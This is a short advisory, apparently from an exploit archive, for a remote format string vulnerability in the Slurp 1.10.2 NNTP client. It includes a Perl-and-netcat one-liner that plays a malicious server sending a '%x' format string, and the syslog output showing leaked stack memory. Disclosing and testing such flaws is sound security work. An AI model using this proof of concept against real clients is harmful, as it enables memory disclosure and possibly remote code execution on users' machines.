Slurp version 1.10.2 suffers from a format string vulnerability.
0c96e9b13a77d9304d469e6855e18fd2f688754dea358bb1daaa7eaaa9212d4f
# Exploit Title: Slurp 1.10.2 - Remote Format String Date: 2022-02-12
# Author: Milad Karimi
slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems.
It may be possible for a remote server to execute code on a vulnerable client. slurp offers functionality that allows the software to write messages to the system log. A format string vulnerability in the syslog function may allow a malicious server to supply a custom format string that writes to an arbitrary address in memory.
perl -e 'print "BY BY BY \n666 %x%x%x\n'" | nc -l -p 112
Then check /var/log/messages for something like:
slurp[39926]: do_newnews: NNTP protocol error: got '666 bfbff4f8804bc1bbfbff51c'